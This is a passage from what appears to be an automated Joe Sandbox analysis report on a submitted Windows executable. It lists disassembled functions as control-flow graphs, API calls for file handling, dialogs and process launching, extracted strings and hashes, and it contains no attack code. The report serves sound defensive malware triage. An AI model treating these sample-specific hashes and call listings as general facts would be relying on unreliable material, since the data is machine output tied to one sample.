call 37b207 call 3935b3 510->518 511->427 512->506 516->499 517->492 527 38bfd7-38bfe6 DeleteFileW 517->527 549 38bf5a-38bf69 call 3935b3 518->549 550 38bf6b-38bf79 call 37b925 518->550 527->492 533 38bfe8-38bfeb 527->533 529->530 530->493 537 38bfef-38c01b call 37400a GetFileAttributesW 533->537 534->490 547 38bfed-38bfee 537->547 548 38c01d-38c033 MoveFileW 537->548 540->427 544 38c327-38c33b SendMessageW 540->544 544->427 547->537 548->492 551 38c035-38c03f MoveFileExW 548->551 549->550 556 38bf7f-38bfbe call 3935b3 call 38f350 549->556 550->511 550->556 551->492 556->517
                          APIs
                          • __EH_prolog.LIBCMT ref: 0038BDFA
                            • Part of subcall function 0038AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0038AAFE
                          • SetWindowTextW.USER32(?,?), ref: 0038C127
                          • _wcsrchr.LIBVCRUNTIME ref: 0038C2B1
                          • GetDlgItem.USER32(?,00000066), ref: 0038C2EC
                          • SetWindowTextW.USER32(00000000,?), ref: 0038C2FC
                          • SendMessageW.USER32(00000000,00000143,00000000,003BA472), ref: 0038C30A
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0038C335
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                          • API String ID: 3564274579-312220925
                          • Opcode ID: ca6342b9e4adfa0a3aece46ef0de5baf5d25db67a6e9501b3d4f64414743ab32
                          • Instruction ID: 857f3f78d0c4e8a1a7d827f1f3a6fec24f3972ec2e9dde54a3c6323560c20fdf
                          • Opcode Fuzzy Hash: ca6342b9e4adfa0a3aece46ef0de5baf5d25db67a6e9501b3d4f64414743ab32
                          • Instruction Fuzzy Hash: 04E17172D04619AADF27EBA0DC45EEF737CAF09310F1144A6F609E7091EB749B848B60
                          Function 0037D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 561 37d341-37d378 call 38e28c call 38e360 call 3915e8 568 37d3ab-37d3b4 call 37fe56 561->568 569 37d37a-37d3a9 GetModuleFileNameW call 37bc85 call 37fe2e 561->569 573 37d3b9-37d3dd call 379619 call 3799b0 568->573 569->573 580 37d3e3-37d3eb 573->580 581 37d7a0-37d7a6 call 379653 573->581 582 37d3ed-37d405 call 383781 * 2 580->582 583 37d409-37d438 call 395a90 * 2 580->583 587 37d7ab-37d7bb 581->587 594 37d407 582->594 595 37d43b-37d43e 583->595 594->583 596 37d444-37d44a call 379e40 595->596 597 37d56c-37d58f call 379d30 call 3935d3 595->597 601 37d44f-37d476 call 379bf0 596->601 597->581 606 37d595-37d5b0 call 379bf0 597->606 607 37d535-37d538 601->607 608 37d47c-37d484 601->608 618 37d5b2-37d5b7 606->618 619 37d5b9-37d5cc call 3935d3 606->619 612 37d53b-37d55d call 379d30 607->612 610 37d486-37d48e 608->610 611 37d4af-37d4ba 608->611 610->611 614 37d490-37d4aa call 395ec0 610->614 615 37d4e5-37d4ed 611->615 616 37d4bc-37d4c8 611->616 612->595 630 37d563-37d566 612->630 634 37d4ac 614->634 635 37d52b-37d533 614->635 623 37d4ef-37d4f7 615->623 624 37d519-37d51d 615->624 616->615 621 37d4ca-37d4cf 616->621 626 37d5f1-37d5f8 618->626 619->581 640 37d5d2-37d5ee call 38137a call 3935ce 619->640 621->615 629 37d4d1-37d4e3 call 395808 621->629 623->624 631 37d4f9-37d513 call 395ec0 623->631 624->607 625 37d51f-37d522 624->625 625->608 637 37d5fc-37d625 call 37fdfb call 3935d3 626->637 638 37d5fa 626->638 629->615 645 37d527 629->645 630->581 630->597 631->581 631->624 634->611 635->612 650 37d627-37d62e call 3935ce 637->650 651 37d633-37d649 637->651 638->637 640->626 645->635 650->581 654 37d731-37d757 call 37ce72 call 3935ce * 2 651->654 655 37d64f-37d65d 651->655 689 37d771-37d79d call 395a90 * 2 654->689 690 37d759-37d76f call 383781 * 2 654->690 657 37d664-37d669 655->657 659 37d66f-37d678 657->659 660 37d97c-37d984 657->660 662 37d684-37d68b 659->662 663 37d67a-37d67e 659->663 664 37d72b-37d72e 660->664 665 37d98a-37d98e 660->665 668 37d691-37d6b6 662->668 669 37d880-37d891 call 37fcbf 662->669 663->660 663->662 664->654 670 37d990-37d996 665->670 671 37d9de-37d9e4 665->671 676 37d6b9-37d6de call 3935b3 call 395808 668->676 691 37d897-37d8c0 call 37fe56 call 395885 669->691 692 37d976-37d979 669->692 677 37d722-37d725 670->677 678 37d99c-37d9a3 670->678 674 37d9e6-37d9ec 671->674 675 37da0a-37da2a call 37ce72 671->675 674->675 684 37d9ee-37d9f4 674->684 697 37da02-37da05 675->697 709 37d6f6 676->709 710 37d6e0-37d6ea 676->710 677->657 677->664 680 37d9a5-37d9a8 678->680 681 37d9ca 678->681 687 37d9c6-37d9c8 680->687 688 37d9aa-37d9ad 680->688 693 37d9cc-37d9d9 681->693 684->677 694 37d9fa-37da01 684->694 687->693 698 37d9c2-37d9c4 688->698 699 37d9af-37d9b2 688->699 689->581 690->689 691->692 721 37d8c6-37d93c call 381596 call 37fdfb call 37fdd4 call 37fdfb call 3958d9 691->721 692->660 693->677 694->697 698->693 704 37d9b4-37d9b8 699->704 705 37d9be-37d9c0 699->705 704->684 711 37d9ba-37d9bc 704->711 705->693 716 37d6f9-37d6fd 709->716 710->709 715 37d6ec-37d6f4 710->715 711->693 715->716 716->676 720 37d6ff-37d706 716->720 722 37d7be-37d7c1 720->722 723 37d70c-37d71a call 37fdfb 720->723 754 37d93e-37d947 721->754 755 37d94a-37d95f 721->755 722->669 725 37d7c7-37d7ce 722->725 730 37d71f 723->730 728 37d7d6-37d7d7 725->728 729 37d7d0-37d7d4 725->729 728->725 729->728 732 37d7d9-37d7e7 729->732 730->677 735 37d7e9-37d7ec 732->735 736 37d808-37d830 call 381596 732->736 738 37d805 735->738 739 37d7ee-37d803 735->739 744 37d853-37d85b 736->744 745 37d832-37d84e call 3935e9 736->745 738->736 739->735 739->738 748 37d862-37d87b call 37dd6b 744->748 749 37d85d 744->749 745->730 748->730 749->748 754->755 756 37d960-37d967 755->756 757 37d973-37d974 756->757 758 37d969-37d96d 756->758 757->756 758->730 758->757
                          APIs
                          • __EH_prolog.LIBCMT ref: 0037D346
                          • _wcschr.LIBVCRUNTIME ref: 0037D367
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0037D328,?), ref: 0037D382
                          • __fprintf_l.LIBCMT ref: 0037D873
                            • Part of subcall function 0038137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0037B652,00000000,?,?,?,0001045C), ref: 00381396
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                          • String ID: $ ,$$%s:$$9:$*messages***$*messages***$@%s:$R$RTL$a
                          • API String ID: 4184910265-552849085
                          • Opcode ID: 2b7aa35ec443bfb269ebbed69fe141ca58c83835400b4cbd457f342359f8b97c
                          • Instruction ID: b36c16d3c3ee2314152584193af17a30dea17cb901d6e1405882b6adec495567
                          • Opcode Fuzzy Hash: 2b7aa35ec443bfb269ebbed69fe141ca58c83835400b4cbd457f342359f8b97c
                          • Instruction Fuzzy Hash: 3712B4B19002199ADF36DFA4DC81BEEB7B9FF05710F108569F509BB181EB789A44CB24
                          Function 0038CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0038AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038AC85
                            • Part of subcall function 0038AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038AC96
                            • Part of subcall function 0038AC74: IsDialogMessageW.USER32(0001045C,?), ref: 0038ACAA
                            • Part of subcall function 0038AC74: TranslateMessage.USER32(?), ref: 0038ACB8
                            • Part of subcall function 0038AC74: DispatchMessageW.USER32(?), ref: 0038ACC2
                          • GetDlgItem.USER32(00000068,003CECB0), ref: 0038CB6E
                          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0038A632,00000001,?,?,0038AECB,003A4F88,003CECB0), ref: 0038CB96
                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0038CBA1
                          • SendMessageW.USER32(00000000,000000C2,00000000,003A35B4), ref: 0038CBAF
                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0038CBC5
                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0038CBDF
                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0038CC23
                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0038CC31
                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0038CC40
                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0038CC67
                          • SendMessageW.USER32(00000000,000000C2,00000000,003A431C), ref: 0038CC76
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                          • String ID: \
                          • API String ID: 3569833718-2967466578
                          • Opcode ID: b9ae7bef783fe2689a0acebbf05a6e18ef5448dc09b26bde75bb5300821b8607
                          • Instruction ID: 9311feefca3ae13b1fa52e29ef3f890e7c573d58f1c8c117e5949d65d39ab095
                          • Opcode Fuzzy Hash: b9ae7bef783fe2689a0acebbf05a6e18ef5448dc09b26bde75bb5300821b8607
                          • Instruction Fuzzy Hash: 2731C271186742AFE303EF24EC4AFAB7FACEB92705F00050AF65196191DB755908C7B6
                          Function 0038CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 795 38ce22-38ce3a call 38e360 798 38d08b-38d093 795->798 799 38ce40-38ce4c call 3935b3 795->799 799->798 802 38ce52-38ce7a call 38f350 799->802 805 38ce7c 802->805 806 38ce84-38ce91 802->806 805->806 807 38ce93 806->807 808 38ce95-38ce9e 806->808 807->808 809 38cea0-38cea2 808->809 810 38ced6 808->810 811 38ceaa-38cead 809->811 812 38ceda-38cedd 810->812 813 38d03c-38d041 811->813 814 38ceb3-38cebb 811->814 815 38cedf-38cee2 812->815 816 38cee4-38cee6 812->816 819 38d043 813->819 820 38d036-38d03a 813->820 817 38cec1-38cec7 814->817 818 38d055-38d05d 814->818 815->816 821 38cef9-38cf0e call 37b493 815->821 816->821 822 38cee8-38ceef 816->822 817->818 823 38cecd-38ced4 817->823 825 38d05f-38d061 818->825 826 38d065-38d06d 818->826 824 38d048-38d04c 819->824 820->813 820->824 830 38cf10-38cf1d call 3817ac 821->830 831 38cf27-38cf32 call 37a180 821->831 822->821 827 38cef1 822->827 823->810 823->811 824->818 825->826 826->812 827->821 830->831 836 38cf1f 830->836 837 38cf4f-38cf5c ShellExecuteExW 831->837 838 38cf34-38cf4b call 37b239 831->838 836->831 840 38d08a 837->840 841 38cf62-38cf6f 837->841 838->837 840->798 843 38cf71-38cf78 841->843 844 38cf82-38cf84 841->844 843->844 845 38cf7a-38cf80 843->845 846 38cf9b-38cfba call 38d2e6 844->846 847 38cf86-38cf8f 844->847 845->844 848 38cff1-38cffd CloseHandle 845->848 846->848 865 38cfbc-38cfc4 846->865 847->846 853 38cf91-38cf99 ShowWindow 847->853 851 38d00e-38d01c 848->851 852 38cfff-38d00c call 3817ac 848->852 854 38d079-38d07b 851->854 855 38d01e-38d020 851->855 852->851 863 38d072 852->863 853->846 854->840 858 38d07d-38d07f 854->858 855->854 860 38d022-38d028 855->860 858->840 862 38d081-38d084 ShowWindow 858->862 860->854 864 38d02a-38d034 860->864 862->840 863->854 864->854 865->848 866 38cfc6-38cfd7 GetExitCodeProcess 865->866 866->848 867 38cfd9-38cfe3 866->867 868 38cfea 867->868 869 38cfe5 867->869 868->848 869->868
                          APIs
                          • ShellExecuteExW.SHELL32(?), ref: 0038CF54
                          • ShowWindow.USER32(?,00000000), ref: 0038CF93
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 0038CFCF
                          • CloseHandle.KERNEL32(?), ref: 0038CFF5
                          • ShowWindow.USER32(?,00000001), ref: 0038D084
                            • Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                          • String ID: $.exe$.inf
                          • API String ID: 3686203788-2452507128
                          • Opcode ID: 0d23c1a38ce6bbbdee69fddd0607cf8fdbbf47e294da75714cf64b3673cd2228
                          • Instruction ID: 854a96acd4a13873e051db74e9a08cc87806bc34c7c8fe06f47b71e2c1e7f550
                          • Opcode Fuzzy Hash: 0d23c1a38ce6bbbdee69fddd0607cf8fdbbf47e294da75714cf64b3673cd2228
                          • Instruction Fuzzy Hash: 1661F8B04143809BE733BF24D800AABBBF9EF85344F05989EF5C597191D7B19985CB62
                          Function 00399029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 870 399029-399040 GetLastError 871 39904e-399055 call 3985a9 870->871 872 399042-39904c call 39a61b 870->872 876 39905a-399060 871->876 872->871 877 39909f-3990a6 SetLastError 872->877 878 39906b-399079 call 39a671 876->878 879 399062 876->879 880 3990a8-3990ad 877->880 885 39907b-39907c 878->885 886 39907e-399094 call 398e16 call 3984de 878->886 881 399063-399069 call 3984de 879->881 889 399096-39909d SetLastError 881->889 885->881 886->877 886->889 889->880
                          APIs
                          • GetLastError.KERNEL32(?,?,?,0039895F,003985FB,?,00398FD3,00000001,00000364,?,00393713,00000050,?,003B0EE8,00000200), ref: 0039902E
                          • _free.LIBCMT ref: 00399063
                          • _free.LIBCMT ref: 0039908A
                          • SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 00399097
                          • SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 003990A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID: X:
                          • API String ID: 3170660625-423137811
                          • Opcode ID: 24507f3a169007d38da64ddb846528fc5470900beef1064cc4bab52337f93c29
                          • Instruction ID: 304239a08fde83f66e76643f3340e02d40a23d440c64c13fca38b74dc978e4ba
                          • Opcode Fuzzy Hash: 24507f3a169007d38da64ddb846528fc5470900beef1064cc4bab52337f93c29
                          • Instruction Fuzzy Hash: 5F01F476605B006BDF23677D6C86B6B2A2D9FD33B1B26012EF52697362EE60CC014160
                          Function 0039A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 893 39a058-39a071 894 39a073-39a083 call 39e6ed 893->894 895 39a087-39a08c 893->895 894->895 902 39a085 894->902 897 39a099-39a0bd MultiByteToWideChar 895->897 898 39a08e-39a096 895->898 900 39a250-39a263 call 38ec4a 897->900 901 39a0c3-39a0cf 897->901 898->897 903 39a0d1-39a0e2 901->903 904 39a123 901->904 902->895 907 39a101-39a112 call 398518 903->907 908 39a0e4-39a0f3 call 3a1a30 903->908 906 39a125-39a127 904->906 910 39a12d-39a140 MultiByteToWideChar 906->910 911 39a245 906->911 907->911 918 39a118 907->918 908->911 921 39a0f9-39a0ff 908->921 910->911 914 39a146-39a158 call 39a72c 910->914 915 39a247-39a24e call 39a2c0 911->915 923 39a15d-39a161 914->923 915->900 922 39a11e-39a121 918->922 921->922 922->906 923->911 925 39a167-39a16e 923->925 926 39a1a8-39a1b4 925->926 927 39a170-39a175 925->927 928 39a200 926->928 929 39a1b6-39a1c7 926->929 927->915 930 39a17b-39a17d 927->930 933 39a202-39a204 928->933 931 39a1c9-39a1d8 call 3a1a30 929->931 932 39a1e2-39a1f3 call 398518 929->932 930->911 934 39a183-39a19d call 39a72c 930->934 937 39a23e-39a244 call 39a2c0 931->937 945 39a1da-39a1e0 931->945 932->937 947 39a1f5 932->947 933->937 938 39a206-39a21f call 39a72c 933->938 934->915 949 39a1a3 934->949 937->911 938->937 951 39a221-39a228 938->951 950 39a1fb-39a1fe 945->950 947->950 949->911 950->933 952 39a22a-39a22b 951->952 953 39a264-39a26a 951->953 954 39a22c-39a23c WideCharToMultiByte 952->954 953->954 954->937 955 39a26c-39a273 call 39a2c0 954->955 955->915
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00394E35,00394E35,?,?,?,0039A2A9,00000001,00000001,3FE85006), ref: 0039A0B2
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0039A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0039A138
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0039A232
                          • __freea.LIBCMT ref: 0039A23F
                            • Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A
                          • __freea.LIBCMT ref: 0039A248
                          • __freea.LIBCMT ref: 0039A26D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 4d2d1c7ff2a9ac29956562862bf2fe624900ad4d013721356c47ae1e8e15b69b
                          • Instruction ID: 8865ff25b0b08fa3cb5cb96231c0395340bbb4b21700ee69e950e4dad321e9a9
                          • Opcode Fuzzy Hash: 4d2d1c7ff2a9ac29956562862bf2fe624900ad4d013721356c47ae1e8e15b69b
                          • Instruction Fuzzy Hash: 5F51C272610A16AFDF269F64CC41EBB77AAEB41750F164B29FC44DA180DB36DC40C6E2
                          Function 0038A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00380085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
                            • Part of subcall function 00380085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2
                          • OleInitialize.OLE32(00000000), ref: 0038A34E
                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0038A385
                          • SHGetMalloc.SHELL32(003B8430), ref: 0038A38F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                          • String ID: riched20.dll$3Ro
                          • API String ID: 3498096277-3613677438
                          • Opcode ID: 455fe1b7f9c3e22e6761687b4437a51596f3fa66a1b0cb591c593123f7b94858
                          • Instruction ID: a8e82048a4cb2c758327d0c481e8004eb434efea2fffc81b614c42e68fc6793f
                          • Opcode Fuzzy Hash: 455fe1b7f9c3e22e6761687b4437a51596f3fa66a1b0cb591c593123f7b94858
                          • Instruction Fuzzy Hash: B0F049B1C00209ABCB11AF99D8499EFFBFCEF95301F00416BE814E2210CBB44605CBA1
                          Function 003799B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 962 3799b0-3799d1 call 38e360 965 3799d3-3799d6 962->965 966 3799dc 962->966 965->966 967 3799d8-3799da 965->967 968 3799de-3799fb 966->968 967->968 969 379a03-379a0d 968->969 970 3799fd 968->970 971 379a12-379a31 call 3770bf 969->971 972 379a0f 969->972 970->969 975 379a33 971->975 976 379a39-379a57 CreateFileW 971->976 972->971 975->976 977 379abb-379ac0 976->977 978 379a59-379a7b GetLastError call 37b66c 976->978 979 379ac2-379ac5 977->979 980 379ae1-379af5 977->980 987 379a7d-379a9f CreateFileW GetLastError 978->987 988 379aaa-379aaf 978->988 979->980 982 379ac7-379adb SetFileTime 979->982 983 379af7-379b0f call 37fe56 980->983 984 379b13-379b1e 980->984 982->980 983->984 989 379aa5-379aa8 987->989 990 379aa1 987->990 988->977 991 379ab1 988->991 989->977 989->988 990->989 991->977
                          APIs
                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,003778AD,?,00000005,?,00000011), ref: 00379A4C
                          • GetLastError.KERNEL32(?,?,003778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00379A59
                          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,003778AD,?,00000005,?), ref: 00379A8E
                          • GetLastError.KERNEL32(?,?,003778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00379A96
                          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,003778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00379ADB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast$Time
                          • String ID:
                          • API String ID: 1999340476-0
                          • Opcode ID: 6d6c73b05ab16552fd36960a19cb0d70fbffd4d753b02146c2590033a223a15a
                          • Instruction ID: 5fa20fa31b6f8f206e8e0f6c7a64ebe46df30de0123b44568804d3d44edd91f7
                          • Opcode Fuzzy Hash: 6d6c73b05ab16552fd36960a19cb0d70fbffd4d753b02146c2590033a223a15a
                          • Instruction Fuzzy Hash: 784178305447456FE332CB20CC06BDABBD4FB06324F10471AFAE9961D0E3B8A988CB95
                          Function 0038AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1021 38ac74-38ac8d PeekMessageW 1022 38acc8-38accc 1021->1022 1023 38ac8f-38aca3 GetMessageW 1021->1023 1024 38acb4-38acc2 TranslateMessage DispatchMessageW 1023->1024 1025 38aca5-38acb2 IsDialogMessageW 1023->1025 1024->1022 1025->1022 1025->1024
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038AC85
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038AC96
                          • IsDialogMessageW.USER32(0001045C,?), ref: 0038ACAA
                          • TranslateMessage.USER32(?), ref: 0038ACB8
